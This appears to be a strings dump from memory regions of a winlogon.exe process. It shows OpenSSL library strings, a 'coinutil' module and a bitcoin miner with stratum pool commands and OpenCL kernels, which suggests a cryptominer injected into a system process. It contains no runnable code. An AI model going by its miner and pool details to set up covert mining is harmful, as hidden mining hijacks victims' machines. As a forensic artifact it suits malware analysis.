%8sVersion: %lu (0x%lx)
%s%lu (%s0x%lx)
s%s
Issuer:%c
Subject:%c
Subject Public Key Info:
sPublic Key Algorithm:
sUnable to load Public Key
%s - d:d:d%.*s %d%s
%s - d:d:d %d%s
%*sAlias: %s
%*sKey Id:
%sX
%*s%s:
value.set
value.single
crypto\asn1\x_pkey.c
public_key
X509_PUBKEY
crypto\asn1\x_pubkey.c
pubkey
cert_info
keyid
X509_CERT_AUX
X509_CERT_PAIR
Big Number part of OpenSSL 1.0.0c 2 Dec 2010
%'%1%=%C%K%O%s%
.%.-.3.7.9.?.W.[.o.y.
C%C'C3C7C9COCWCiC
?456789:;<=
!"#$%&'()* ,-./0123
EVP part of OpenSSL 1.0.0c 2 Dec 2010
EVP_PKEY_derive
EVP_PKEY_derive_init
EVP_PKEY_derive_set_peer
EVP_PKEY_encrypt
EVP_PKEY_encrypt_init
EVP_PKEY_encrypt_old
EVP_PKEY_get1_DH
EVP_PKEY_get1_DSA
EVP_PKEY_GET1_ECDSA
EVP_PKEY_get1_EC_KEY
EVP_PKEY_get1_RSA
EVP_PKEY_keygen
EVP_PKEY_keygen_init
EVP_PKEY_new
EVP_PKEY_paramgen
EVP_PKEY_paramgen_init
EVP_PKEY_sign
EVP_PKEY_sign_init
EVP_PKEY_verify
EVP_PKEY_verify_init
EVP_PKEY_verify_recover
EVP_PKEY_verify_recover_init
FIPS_CIPHER_CTX_SET_KEY_LENGTH
PKCS5_PBE_keyivgen
PKCS5_v2_PBE_keyivgen
PKCS5_V2_PBKDF2_KEYIVGEN
PKEY_SET_TYPE
aes key setup failed
bad key length
bn pubkey error
camellia key setup failed
command not supported
ctrl operation not implemented
different key types
expecting an rsa key
expecting a dh key
expecting a dsa key
expecting a ecdsa key
expecting a ec key
invalid key length
invalid operation
keygen failure
method not supported
no key set
no operation set
operation not supported for this keytype
operaton not initialized
private key decode error
private key encode error
public key not rsa
unsuported number of rounds
unsupported algorithm
unsupported keylength
unsupported key derivation function
unsupported key size
unsupported prf
unsupported private key algorithm
unsupported salt type
AESNI_INIT_KEY
AES_INIT_KEY
CAMELLIA_INIT_KEY
D2I_PKEY
DSAPKEY2PKCS8
DSA_PKEY2PKCS8
ECDSA_PKEY2PKCS8
ECKEY_PKEY2PKCS8
EVP_CIPHER_CTX_set_key_length
EVP_PKCS82PKEY
EVP_PKCS82PKEY_BROKEN
EVP_PKEY2PKCS8_broken
EVP_PKEY_copy_parameters
EVP_PKEY_CTX_ctrl
EVP_PKEY_CTX_ctrl_str
EVP_PKEY_CTX_dup
EVP_PKEY_decrypt
EVP_PKEY_decrypt_init
EVP_PKEY_decrypt_old
nkey <= EVP_MAX_KEY_LENGTH
crypto\evp\evp_key.c
crypto\evp\evp_pkey.c
EVP_CIPHER_key_length(cipher) <= (int)sizeof(md_tmp)
keylen <= sizeof key
%s algorithm "%s" unsupported
Public Key
j <= (int)sizeof(ctx->key)
len>=0 && len<=(int)sizeof(ctx->key)
Private-Key
Public-Key
%s: (%d bit)
value.named_curve
value.parameters
value.implicitlyCA
privateKey
publicKey
EC_PRIVATEKEY
p.other
p.onBasis
p.tpBasis
p.ppBasis
p.prime
p.char_two
invalid private key
keys not set
missing private key
not a supported NIST prime
passed null parameter
unsupported field
d2i_ECPrivateKey
DO_EC_KEY_PRINT
ECKEY_PARAM2TYPE
ECKEY_PARAM_DECODE
ECKEY_PRIV_DECODE
ECKEY_PRIV_ENCODE
ECKEY_PUB_DECODE
ECKEY_PUB_ENCODE
ECKEY_TYPE2PARAM
EC_KEY_check_key
EC_KEY_copy
EC_KEY_generate_key
EC_KEY_new
EC_KEY_print
EC_KEY_print_fp
EC_KEY_set_public_key_affine_coordinates
i2d_ECPrivateKey
i2o_ECPublicKey
o2i_ECPublicKey
PKEY_EC_CTRL
PKEY_EC_CTRL_STR
PKEY_EC_DERIVE
PKEY_EC_KEYGEN
PKEY_EC_PARAMGEN
PKEY_EC_SIGN
gf2m not supported
crypto\ec\ec_key.c
EC part of OpenSSL 1.0.0c 2 Dec 2010
ASN1 OID: %s
Field Type: %s
Basis Type: %s
pub_key
priv_key
DSA_generate_key
PKEY_DSA_CTRL
PKEY_DSA_KEYGEN
data too large for key size
DSA part of OpenSSL 1.0.0c 2 Dec 2010
Private-Key: (%d bit)
Public-Key: (%d bit)
PKEY_RSA_CTRL
PKEY_RSA_CTRL_STR
PKEY_RSA_SIGN
PKEY_RSA_VERIFY
PKEY_RSA_VERIFYRECOVER
RSA_BUILTIN_KEYGEN
RSA_check_key
RSA_generate_key
RSA_generate_key_ex
data too small for key size
digest too big for rsa key
illegal or unsupported padding mode
invalid keybits
key size too small
operation not allowed in fips mode
rsa operations not supported
unsupported mask algorithm
unsupported mask parameter
unsupported signature type
RSA part of OpenSSL 1.0.0c 2 Dec 2010
rsa_keygen_bits
rsa_keygen_pubexp
PKCS#3 DH Private-Key
PKCS#3 DH Public-Key
private-key:
public-key:
recommended-private-length: %d bits
COMPUTE_KEY
DH_compute_key
DH_generate_key
GENERATE_KEY
PKEY_DH_DERIVE
PKEY_DH_KEYGEN
invalid public key
crypto\dh\dh_key.c
Diffie-Hellman part of OpenSSL 1.0.0c 2 Dec 2010
d.other
d.data
d.sign
d.enveloped
d.signed_and_enveloped
d.digest
d.encrypted
cert
key_enc_algor
enc_key
PKCS7_add_certificate
certificate verify error
decrypted key is wrong length
encryption not supported for this key type
no recipient matches certificate
no recipient matches key
operation not supported on this type
private key does not match certificate
signer certificate not found
signing not supported for this key type
unable to find certificate
unknown operation
unsupported cipher type
unsupported content type
keyEncryptionAlgorithm
encryptedKey
CMS_KeyTransRecipientInfo
keyAttrId
keyAttr
CMS_OtherKeyAttribute
subjectKeyIdentifier
CMS_RecipientKeyIdentifier
d.rKeyId
CMS_KeyAgreeRecipientIdentifier
CMS_RecipientEncryptedKey
CMS_OriginatorPublicKey
d.originatorKey
CMS_OriginatorIdentifierOrKey
recipientEncryptedKeys
CMS_KeyAgreeRecipientInfo
keyIdentifier
keyDerivationAlgorithm
CMS_PasswordRecipientInfo
d.ktri
d.kari
d.kekri
d.pwri
d.ori
d.signedData
d.envelopedData
d.digestedData
d.encryptedData
d.authenticatedData
d.compressedData
d.allOrFirstTier
d.receiptList
otherCertFormat
otherCert
CMS_OtherCertificateFormat
d.certificate
d.extendedCertificate
d.v1AttrCert
d.v2AttrCert
CMS_CertificateChoices
d.issuerAndSerialNumber
d.subjectKeyIdentifier
d.crl
certificates
certificate already present
certificate has no keyid
error getting public key
error setting key
invalid encrypted key length
msgsigdigest error
msgsigdigest verification failure
msgsigdigest wrong length
not key transport
not supported for this key type
no key
no key or cert
no msgsigdigest
no private key
no public key
unsupported compression algorithm
unsupported kek algorithm
unsupported recipient type
unsupported recpientinfo type
CMS_add0_cert
CMS_add0_recipient_key
CMS_add1_recipient_cert
CMS_decrypt_set1_key
CMS_decrypt_set1_pkey
CMS_EncryptedData_set1_key
CMS_GET0_CERTIFICATE_CHOICES
cms_msgSigDigest_add1
CMS_RecipientInfo_ktri_cert_cmp
CMS_RecipientInfo_set0_key
CMS_RecipientInfo_set0_pkey
CMS_SIGNERINFO_VERIFY_CERT
Load certs from files in a directory
%s%clx.%s%d
/usr/local/ssl/certs
/usr/local/ssl/cert.pem
SSL_CERT_DIR
SSL_CERT_FILE
ADD_CERT_DIR
GET_CERT_BY_SUBJECT
X509_check_private_key
X509_get_pubkey_parameters
X509_load_cert_crl_file
X509_load_cert_file
X509_PUBKEY_get
X509_PUBKEY_set
X509_REQ_check_private_key
X509_STORE_add_cert
X509_verify_cert
cant check dh key
cert already in hash table
key type mismatch
key values mismatch
loading cert dir
no cert set for us to verify
public key decode error
public key encode error
unable to get certs public key
unknown key type
X.509 part of OpenSSL 1.0.0c 2 Dec 2010
OPENSSL_ALLOW_PROXY_CERTS
ECDSA part of OpenSSL 1.0.0c 2 Dec 2010
SHA1 part of OpenSSL 1.0.0c 2 Dec 2010
SHA-256 part of OpenSSL 1.0.0c 2 Dec 2010
SHA-512 part of OpenSSL 1.0.0c 2 Dec 2010
DlSHA part of OpenSSL 1.0.0c 2 Dec 2010
crypto\x509v3\v3_akey.c
AUTHORITY_KEYID
%d.%d.%d.%d
othername:
X400Name:
EdiPartyName:
email:%s
DNS:%s
URI:%s
IP Address:%d.%d.%d.%d
Key Encipherment
keyEncipherment
Key Agreement
keyAgreement
Certificate Sign
keyCertSign
d.cpsuri
d.usernotice
CERTIFICATEPOLICIES
%*sCPS: %s
%*sOrganization: %s
%*sNumber%s:
%*sExplicit Text: %s
name.fullname
name.relativename
Key Compromise
keyCompromise
Cessation Of Operation
cessationOfOperation
Certificate Hold
certificateHold
%*sOnly User Certificates
%*sOnly CA Certificates
%*sOnly Attribute Certificates
EXTENDED_KEY_USAGE
d.otherName
d.rfc822Name
d.dNSName
d.directoryName
d.ediPartyName
d.uniformResourceIdentifier
d.iPAddress
d.registeredID
%d.%d.%d.%d/%d.%d.%d.%d
%*scrlUrl:
%*sPolicy Text: %s
PROXY_CERT_INFO_EXTENSION
PKEY_USAGE_PERIOD
%s:%s
%*s%s
%*s
crypto\x509v3\v3_skey.c
%*sZone: %s, User:
unable to get issuer keyid
unsupported option
R2I_CERTPOL
S2I_ASN1_SKEY_ID
S2I_SKEY_ID
V2I_AUTHORITY_KEYID
V2I_EXTENDED_KEY_USAGE
extension setting not supported
no issuer certificate
no proxy cert policy language defined
operation not defined
policy syntax not currently supported
ECDH_compute_key
ECDH part of OpenSSL 1.0.0c 2 Dec 2010
value.other
value.x509cert
value.sdsicert
value.keybag
value.shkeybag
value.safes
value.bag
crypto\pkcs12\p12_key.c
PKCS12_add_localkeyid
PKCS12_key_gen_asc
PKCS12_key_gen_uni
PKCS12_MAKE_KEYBAG
PKCS12_MAKE_SHKEYBAG
PKCS12_newpass
PKCS12_PBE_keyivgen
PKCS8_add_keyusage
key gen error
unsupported pkcs12 mode
CONF_def part of OpenSSL 1.0.0c 2 Dec 2010
[%s] %s=%s
[[%s]]
CONF part of OpenSSL 1.0.0c 2 Dec 2010
MD5 part of OpenSSL 1.0.0c 2 Dec 2010
WIN32_JOINER
functionality not supported
CERTIFICATE REQUEST
NEW CERTIFICATE REQUEST
CERTIFICATE
RSA PRIVATE KEY
RSA PUBLIC KEY
DSA PRIVATE KEY
EC PRIVATE KEY
d2i_PKCS8PrivateKey_bio
d2i_PKCS8PrivateKey_fp
DO_PK8PKEY
DO_PK8PKEY_FP
PEM_F_PEM_WRITE_PKCS8PRIVATEKEY
PEM_PK8PKEY
PEM_READ_BIO_PRIVATEKEY
PEM_READ_PRIVATEKEY
PEM_WRITE_PRIVATEKEY
error converting private key
expecting private key blob
expecting public key blob
keyblob header parse error
keyblob too short
problems getting password
public key no rsa
read key
unsupported encryption
unsupported key components
X509 CERTIFICATE
TRUSTED CERTIFICATE
PEM part of OpenSSL 1.0.0c 2 Dec 2010
Enter PEM pass phrase:
phrase is too short, needs to be at least %d chars
ANY PRIVATE KEY
ENCRYPTED PRIVATE KEY
PRIVATE KEY
crypto\pem\pem_pkey.c
crlUrl
issuerKeyHash
OCSP_CERTID
reqCert
value.byName
value.byKey
value.good
value.revoked
value.unknown
OCSP_CERTSTATUS
certId
certStatus
OCSP_cert_id_new
OCSP_parse_url
PARSE_HTTP_LINE1
error parsing url
no certificates in chain
unsupported requestorname type
Verifying - %s
zlib not supported
hash of hash of key mismatch
hash of key mismatch
ESS_ADD_SIGNING_CERT
ESS_CERT_ID_NEW_INIT
ESS_SIGNING_CERT_NEW_INIT
TS_CHECK_SIGNING_CERTS
TS_MSG_IMPRINT_set_algo
TS_REQ_set_msg_imprint
TS_RESP_CTX_set_certs
TS_RESP_CTX_set_signer_cert
TS_TST_INFO_set_msg_imprint
TS_VERIFY_CERT
ess add signing cert error
ess signing certificate error
invalid signer certificate purpose
unsupported md algorithm
unsupported version
MD2 part of OpenSSL 1.0.0c 2 Dec 2010
RC2 part of OpenSSL 1.0.0c 2 Dec 2010
RC4 part of OpenSSL 1.0.0c 2 Dec 2010
IDEA part of OpenSSL 1.0.0c 2 Dec 2010
DES part of OpenSSL 1.0.0c 2 Dec 2010
libdes part of OpenSSL 1.0.0c 2 Dec 2010
Blowfish part of OpenSSL 1.0.0c 2 Dec 2010
:CAST part of OpenSSL 1.0.0c 2 Dec 2010
MD4 part of OpenSSL 1.0.0c 2 Dec 2010
RIPE-MD160 part of OpenSSL 1.0.0c 2 Dec 2010
s->s2->key_material_length <= sizeof s->s2->key_material
c->iv_len <= (int)sizeof(s->session->key_arg)
SSLv2 part of OpenSSL 1.0.0c 2 Dec 2010
s->session->master_key_length >= 0 && s->session->master_key_length < (int)sizeof(s->session->master_key)
SSLv3 part of OpenSSL 1.0.0c 2 Dec 2010
GOST signature length is %d
os.length <= (int)sizeof(ret->session_id)
ssl\ssl_cert.c
%-23s %s Kx=%-8s Au=%-4s Enc=%-9s Mac=%-4s%s
EXPORT
EXPORT40
EXPORT56
public key encrypt error
SSL_SESS_CERT_NEW
public key is not rsa
SSL_SET_CERT
SSL_SET_PKEY
reuse cert length not zero
reuse cert type not zero
SSL_use_certificate
SSL_use_certificate_ASN1
SSL_use_certificate_file
SSL_use_PrivateKey
SSL_use_PrivateKey_ASN1
signature for non signing certificate
SSL_use_PrivateKey_file
SSL_use_RSAPrivateKey
SSL_use_RSAPrivateKey_ASN1
SSL_use_RSAPrivateKey_file
SSL_VERIFY_CERT_CHAIN
tls1_cert_verify_mac
sslv3 alert bad certificate
sslv3 alert certificate expired
sslv3 alert certificate revoked
sslv3 alert certificate unknown
TLS1_SETUP_KEY_BLOCK
sslv3 alert no certificate
sslv3 alert unsupported certificate
tlsv1 alert export restriction
tlsv1 bad certificate hash value
tlsv1 bad certificate status response
tlsv1 certificate unobtainable
tlsv1 unsupported extension
tls client cert req with anon cipher
tls peer did not respond with certificate list
tried to use unsupported cipher
unable to decode dh certs
unable to decode ecdh certs
unable to extract public key
unable to find public key parameters
unknown certificate type
unknown key exchange type
unknown pkey type
unsupported digest type
unsupported elliptic curve
unsupported protocol
unsupported ssl version
unsupported status type
wrong number of key bits
CLIENT_CERTIFICATE
CLIENT_MASTER_KEY
DTLS1_ADD_CERT_TO_BUF
bad dh pub key length
bad ecc cert
DTLS1_OUTPUT_CERT_CHAIN
DTLS1_SEND_CERTIFICATE_REQUEST
DTLS1_SEND_CLIENT_CERTIFICATE
DTLS1_SEND_CLIENT_KEY_EXCHANGE
DTLS1_SEND_SERVER_CERTIFICATE
DTLS1_SEND_SERVER_KEY_EXCHANGE
GET_CLIENT_MASTER_KEY
REQUEST_CERTIFICATE
certificate verify failed
cert length mismatch
SSL2_GENERATE_KEY_MATERIAL
SSL2_SET_CERTIFICATE
SSL3_ADD_CERT_TO_BUF
SSL3_CHECK_CERT_AND_ALGORITHM
ecc cert not for key agreement
ecc cert not for signing
ecc cert should have rsa signature
ecc cert should have sha1 signature
SSL3_GENERATE_KEY_BLOCK
error generating tmp rsa key
SSL3_GET_CERTIFICATE_REQUEST
SSL3_GET_CERT_STATUS
SSL3_GET_CERT_VERIFY
SSL3_GET_CLIENT_CERTIFICATE
https proxy request
SSL3_GET_CLIENT_KEY_EXCHANGE
http request
SSL3_GET_KEY_EXCHANGE
SSL3_GET_SERVER_CERTIFICATE
invalid ticket keys length
key arg too long
SSL3_OUTPUT_CERT_CHAIN
SSL3_SEND_CERTIFICATE_REQUEST
SSL3_SEND_CLIENT_CERTIFICATE
SSL3_SEND_CLIENT_KEY_EXCHANGE
krb5 server rd_req (keytab perms?)
SSL3_SEND_SERVER_CERTIFICATE
SSL3_SEND_SERVER_KEY_EXCHANGE
SSL3_SETUP_KEY_BLOCK
missing dh dsa cert
missing dh key
SSL_add_dir_cert_subjects_to_stack
missing dh rsa cert
SSL_add_file_cert_subjects_to_stack
missing dsa signing cert
missing export tmp dh key
missing export tmp rsa key
missing rsa certificate
missing rsa encrypting cert
SSL_CERT_DUP
missing rsa signing cert
SSL_CERT_INST
missing tmp dh key
SSL_CERT_INSTANTIATE
missing tmp ecdh key
SSL_CERT_NEW
missing tmp rsa key
SSL_check_private_key
missing tmp rsa pkey
SSL_CHECK_SRVR_ECC_CERT_AND_ALG
no certificates returned
no certificate assigned
no certificate returned
no certificate set
no certificate specified
SSL_CTX_check_private_key
no ciphers passed
SSL_CTX_set_client_cert_engine
no client cert method
no client cert received
Peer haven't sent GOST certificate, required for selected ciphersuite
SSL_CTX_use_certificate
SSL_CTX_use_certificate_ASN1
no privatekey
SSL_CTX_use_certificate_chain_file
no private key assigned
SSL_CTX_use_certificate_file
SSL_CTX_use_PrivateKey
no publickey
SSL_CTX_use_PrivateKey_ASN1
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_RSAPrivateKey
SSL_CTX_use_RSAPrivateKey_ASN1
SSL_CTX_use_RSAPrivateKey_file
null ssl method passed
SSL_GET_SERVER_SEND_CERT
SSL_GET_SIGN_PKEY
peer did not return a certificate
peer error certificate
peer error no certificate
peer error unsupported certificate type
SSLv2 write client master key A
SSLv2 write client master key B
SSLv2 write client certificate A
SSLv2 write client certificate B
SSLv2 write client certificate C
SSLv2 write client certificate D
SSLv2 read client master key A
SSLv2 read client master key B
SSLv2 write request certificate A
SSLv2 write request certificate B
SSLv2 write request certificate C
SSLv2 write request certificate D
SSLv2 X509 read server certificate
SSLv2 X509 read client certificate
SSLv3 read server certificate A
SSLv3 read server certificate B
SSLv3 read server key exchange A
SSLv3 read server key exchange B
SSLv3 read server certificate request A
SSLv3 read server certificate request B
SSLv3 write client certificate A
SSLv3 write client certificate B
SSLv3 write client certificate C
SSLv3 write client certificate D
SSLv3 write client key exchange A
SSLv3 write client key exchange B
SSLv3 write certificate verify A
SSLv3 write certificate verify B
SSLv3 write certificate A
SSLv3 write certificate B
SSLv3 write key exchange A
SSLv3 write key exchange B
SSLv3 write certificate request A
SSLv3 write certificate request B
SSLv3 read client certificate A
SSLv3 read client certificate B
SSLv3 read client key exchange A
SSLv3 read client key exchange B
SSLv3 read certificate verify A
SSLv3 read certificate verify B
key expansion
client write key
server write key
TLSv1 part of OpenSSL 1.0.0c 2 Dec 2010
IBM_4758_LOAD_PRIVKEY
IBM_4758_LOAD_PUBKEY
IBM 4758 CCA hardware engine support
IBM 4758 CCA RSA key handle
AEP_MOD_EXP_CRT
missing key components
mod exp crt failed
Aep hardware engine support
AEP_ModExpCrt
Atalla hardware engine support
ASI_RSAPrivateKeyOpFn
list_certs
List all certificates in store
lookup_cert
Lookup and output certificates
key_type
Key type: 1=AT_KEYEXCHANGE (default), 2=AT_SIGNATURE
Set list options (1=summary,2=friendly name, 4=full printout, 8=PEM output, 16=XXX, 32=private key info)
Set key lookup method (1=substring, 2=friendlyname, 3=container name)
certificate store name, default "MY"
Certificate store flags: 1 = system store
CAPI_CERT_GET_FNAME
CAPI_GET_KEY
CAPI_GET_PKEY
CAPI_LOAD_PRIVKEY
CERT_SELECT_DIALOG
CLIENT_CERT_SELECT
cant get key
error adding cert
error getting key provider info
function not supported
getuserkey error
invalid dsa public key blob magic number
invalid public key blob
invalid rsa public key blob magic number
pubkey export error
pubkey export length error
unsupported algorithm nid
unsupported padding
unsupported public key algorithm
Setting store name to %s
Setting flags to %d
Setting debug level to %d
Setting debug file to %s
Setting key type to %d
aiKeyAlg=0x
capi_get_provname, index=%d
capi_get_provname, returned name=%s, type=%d
%d. %s, type %d
Listing containers CSP=%s, type = %d
Got max container len %d
Container name %s, len=%d, index=%d, flags=%d
%d. %s
No Private Key
Private Key Info:
Provider Name: %s, Provider Type %d
Container Name: %s, Key Type %d
capi_cert_get_fname
Friendly Name "%s"
Opening certificate store %s
Listing certs for store %s
Certificate %d
capi_get_key, contname=%s, provname=%s, type=%d
capi_ctx_set_provname, name=%s, type=%d
Can't Parse Certificate %d
HWCRHK_GET_PASS
HWCRHK_LOAD_PRIVKEY
HWCRHK_LOAD_PUBKEY
private key algorithms disabled
CHIL hardware engine support
HWCryptoHook_RSALoadKey
HWCryptoHook_RSAGetPublicKey
HWCryptoHook_RSAUnloadKey
HWCryptoHook_ModExpCRT
nFast HWCryptoHook RSA key handle
pass phrase
Current card: "%s"
Insert card "%s"
CSWIFT_MOD_EXP_CRT
bad key size
CryptoSwift hardware engine support
swAttachKeyParam
Nuron hardware engine support
VIA PadLock (%s, %s)
SUREWAREHK_LOAD_PRIVKEY
SUREWAREHK_LOAD_PUBKEY
SureWare hardware engine support
SureWareHook_Load_Privkey
SureWareHook_Info_Pubkey
SureWareHook_Load_Rsa_Pubkey
SureWareHook_Load_Dsa_Pubkey
SureWareHook RSA key handle
SureWareHook DSA key handle
ENGINE_load_privkey
ENGINE_load_pubkey
UBSEC_DH_COMPUTE_KEY
UBSEC_DH_GENERATE_KEY
UBSEC_MOD_EXP_CRT
UBSEC_RSA_MOD_EXP_CRT
UBSEC hardware engine support
rsa_mod_exp_crt_ioctl
ubsec_max_key_len_ioctl
/dev/ubskey
GOST2001_KEYGEN
PKEY_GOST01CP_DECRYPT
PKEY_GOST01CP_ENCRYPT
PKEY_GOST01CP_KEYGEN
PKEY_GOST01_PARAMGEN
PKEY_GOST2001_DERIVE
PKEY_GOST94CP_DECRYPT
PKEY_GOST94CP_ENCRYPT
PKEY_GOST94CP_KEYGEN
PKEY_GOST94_PARAMGEN
PKEY_GOST_CTRL
PKEY_GOST_CTRL01_STR
PKEY_GOST_CTRL94_STR
PKEY_GOST_MAC_CTRL
PKEY_GOST_MAC_CTRL_STR
PKEY_GOST_MAC_KEYGEN
bad key parameters format
bad pkey parameters format
cannot pack ephemeral key
error computing shared key
error packing key transport info
error parsing key transport info
invalid mac key length
key is not initalized
key is not initialized
key parameters missing
mac key not set
no peer key
no private part of non ephemeral keypair
public key undefined
unsupported cipher ctl command
unsupported parameter set
engines\ccgost\gost2001_keyx.c
gkt->key_agreement_info->eph_iv->length==8
gkt->key_info->encrypted_key->length==32
gkt->key_info->imit->length==4
 engines\ccgost\gost94_keyx.c
Private key:
Public key:
Parameter set: %s
Public key:
GOST_CLIENT_KEY_EXCHANGE_PARAMS
key_info
key_agreement_info
GOST_KEY_TRANSPORT
encrypted_key
GOST_KEY_INFO
ephem_key
GOST_KEY_AGREEMENT_INFO
key_params
GOST_KEY_PARAMS
ENGINE_set_pkey_meths failed
ENGINE_set_pkey_asn1_meths failed
ENGINE_set_cmd_defns failed
C:\OUT\FINAL_OUT\Release\PDB\openssl.pdb
OPENSSL.dll
CryptGetUserKey
CryptExportKey
CryptDestroyKey
ReportEventA
CertGetCertificateContextProperty
CertFreeCertificateContext
CertDuplicateCertificateContext
CertFindCertificateInStore
CertEnumCertificatesInStore
CertCloseStore
CertOpenStore
GetProcessWindowStation
~L?(5p%0XX
%Fn-#
.text
`.rdata
@.data
.rsrc
@.reloc

winlogon.exe_2224_rwx_13801000_00013000:

advapi32.dll
Why do most humans not understand their shortcomings? The funny thing with the human brain is it makes everyone arrogant at their core. Sure some may fight it more than others but in every brain there is something telling them, HEY YOU ARE THE MOST IMPORTANT PERSON IN THE WORLD. THE CENTER OF THE UNIVERSE. But we can't all be that, can we? Well perhaps we can, introducing GODria, take 2 pills of this daily and you can be like RealSolid, lord of the universe.
C:\OUT\FINAL_OUT\Release\PDB\coinutil.pdb
.?AV?$CIndexedContainer@_KVCVector@ExtSTL@@V?$allocator@_K@2@@ExtSTL@@
.?AV?$CIndexedContainer@DVCVector@ExtSTL@@V?$allocator@D@2@@ExtSTL@@
.?AV?$CIndexedContainer@EVCVector@ExtSTL@@V?$allocator@E@2@@ExtSTL@@
.text
`.rdata
@.data
.rsrc
@.reloc
File coin-chains.xml not Found or corrupted

winlogon.exe_2224_rwx_13901000_00067000:

IMAGE_FORMAT_NOT_SUPPORTED
PROGRAM_EXECUTABLE
OPERATION
atiadlxy.dll
atiadlxx.dll
.text
opencl.dll
fpgaminer_x6500-overclocker-0402.bit
http://ufasoft.com
PortName
http://
^(http://)?[^/] (/)?
"host":"([^"] )","port":(\d ),"ttr":(\d )
btc-evergreen.il
btc.il
phatk.cl
scrypt.cl
phatk.ptx
stratum tcp
xpt tcp
kernel32.dll
mining.submit
mining.set_difficulty
mining.notify
mining.subscribe
mining.authorize
OpenCL.dll
C:\OUT\FINAL_OUT\Release\PDB\miner.pdb
.?AV?$CIndexedContainer@DVCVector@ExtSTL@@V?$allocator@D@2@@ExtSTL@@
.?AV?$CIndexedContainer@IVCVector@ExtSTL@@V?$allocator@I@2@@ExtSTL@@
.?AV?$CIndexedContainer@U?$pair@VCBaseIterator@CList@ExtSTL@@V123@@ExtSTL@@VCVector@2@V?$allocator@U?$pair@VCBaseIterator@CList@ExtSTL@@V123@@ExtSTL@@@2@@ExtSTL@@
.?AV?$CIndexedContainer@_KVCVector@ExtSTL@@V?$allocator@_K@2@@ExtSTL@@
.?AV?$CIndexedContainer@PAXVCVector@ExtSTL@@V?$allocator@PAX@2@@ExtSTL@@
.?AV?$CIndexedContainer@VPlatform@cl@Ext@@VCVector@ExtSTL@@V?$allocator@VPlatform@cl@Ext@@@5@@ExtSTL@@
.?AV?$CIndexedContainer@VDevice@cl@Ext@@VCVector@ExtSTL@@V?$allocator@VDevice@cl@Ext@@@5@@ExtSTL@@
.?AV?$CIndexedContainer@UProgramBinary@cl@Ext@@VCVector@ExtSTL@@V?$allocator@UProgramBinary@cl@Ext@@@5@@ExtSTL@@
.?AV?$CIndexedContainer@PBDVCVector@ExtSTL@@V?$allocator@PBD@2@@ExtSTL@@
.?AV?$CIndexedContainer@UAdapterInfo@@VCVector@ExtSTL@@V?$allocator@UAdapterInfo@@@3@@ExtSTL@@
.?AV?$CIndexedContainer@_WVCVector@ExtSTL@@V?$allocator@_W@2@@ExtSTL@@
.?AVCCmdTarget@Ext@@
.?AV?$CIndexedContainer@VString@Ext@@VCVector@ExtSTL@@V?$allocator@VString@Ext@@@4@@ExtSTL@@
.?AV?$CIndexedContainer@V?$ptr@VComputationDevice@Coin@@VInterlocked@Ext@@@Ext@@VCVector@ExtSTL@@V?$allocator@V?$ptr@VComputationDevice@Coin@@VInterlocked@Ext@@@Ext@@@4@@ExtSTL@@
.?AV?$CIndexedContainer@V?$ptr@VThread@Ext@@VInterlocked@2@@Ext@@VCVector@ExtSTL@@V?$allocator@V?$ptr@VThread@Ext@@VInterlocked@2@@Ext@@@4@@ExtSTL@@
.?AV?$vector@USUrlTtr@Coin@@V?$allocator@USUrlTtr@Coin@@@ExtSTL@@@ExtSTL@@
.?AV?$CIndexedContainer@USUrlTtr@Coin@@VCVector@ExtSTL@@V?$allocator@USUrlTtr@Coin@@@4@@ExtSTL@@
.?AV?$CContainer@USUrlTtr@Coin@@VCVector@ExtSTL@@V?$allocator@USUrlTtr@Coin@@@4@@ExtSTL@@
.?AV?$CIndexedContainer@VAdlDevice@Gpu@Ext@@VCVector@ExtSTL@@V?$allocator@VAdlDevice@Gpu@Ext@@@5@@ExtSTL@@
.?AV?$CIndexedContainer@V?$ptr@VGpuDevice@Coin@@VInterlocked@Ext@@@Ext@@VCVector@ExtSTL@@V?$allocator@V?$ptr@VGpuDevice@Coin@@VInterlocked@Ext@@@Ext@@@4@@ExtSTL@@
.?AV?$CIndexedContainer@V?$ptr@VGpuTask@Coin@@VNonInterlocked@Ext@@@Ext@@VCVector@ExtSTL@@V?$allocator@V?$ptr@VGpuTask@Coin@@VNonInterlocked@Ext@@@Ext@@@4@@ExtSTL@@
.?AV?$CIndexedContainer@USection@Coin@@VCVector@ExtSTL@@V?$allocator@USection@Coin@@@4@@ExtSTL@@
.?AV?$CIndexedContainer@VGDevice@Coin@@VCVector@ExtSTL@@V?$allocator@VGDevice@Coin@@@4@@ExtSTL@@
.?AV?$CIndexedContainer@V?$sub_match@PBD@ExtSTL@@VCVector@2@V?$allocator@V?$sub_match@PBD@ExtSTL@@@2@@ExtSTL@@
.?AVRegistryKey@Ext@@
.?AV?$CIndexedContainer@UFreqData@Coin@@VCVector@ExtSTL@@V?$allocator@UFreqData@Coin@@@4@@ExtSTL@@
.?AV?$CIndexedContainer@VEvent@cl@Ext@@VCVector@ExtSTL@@V?$allocator@VEvent@cl@Ext@@@5@@ExtSTL@@
.?AV?$CIndexedContainer@VBuffer@cl@Ext@@VCVector@ExtSTL@@V?$allocator@VBuffer@cl@Ext@@@5@@ExtSTL@@
.?AV?$CIndexedContainer@U?$pair@VBuffer@cl@Ext@@VEvent@23@@ExtSTL@@VCDeque@2@V?$allocator@U?$pair@VBuffer@cl@Ext@@VEvent@23@@ExtSTL@@@2@@ExtSTL@@
.?AVWebHeaderCollection@Ext@@
.?AVHttpWebResponse@Ext@@
.?AVWebClient@Ext@@
.?AV?$CIndexedContainer@VHashValue@Coin@@VCVector@ExtSTL@@V?$allocator@VHashValue@Coin@@@4@@ExtSTL@@
.?AV?$CIndexedContainer@UMinerTx@Coin@@VCVector@ExtSTL@@V?$allocator@UMinerTx@Coin@@@4@@ExtSTL@@
.?AVBitcoinWebClient@Coin@@
.?AV?$CIndexedContainer@UDtHashesChains@GetWorkThread@Coin@@VCDeque@ExtSTL@@V?$allocator@UDtHashesChains@GetWorkThread@Coin@@@5@@ExtSTL@@
.?AV?$CIndexedContainer@PAV?$CSocketKeeper@V?$SocketThreadWrap@VThread@Ext@@@Ext@@@Ext@@VCVector@ExtSTL@@V?$allocator@PAV?$CSocketKeeper@V?$SocketThreadWrap@VThread@Ext@@@Ext@@@Ext@@@4@@ExtSTL@@
.?AV?$CIndexedContainer@VVarValue@Ext@@VCVector@ExtSTL@@V?$allocator@VVarValue@Ext@@@4@@ExtSTL@@
SetupDiOpenDevRegKey
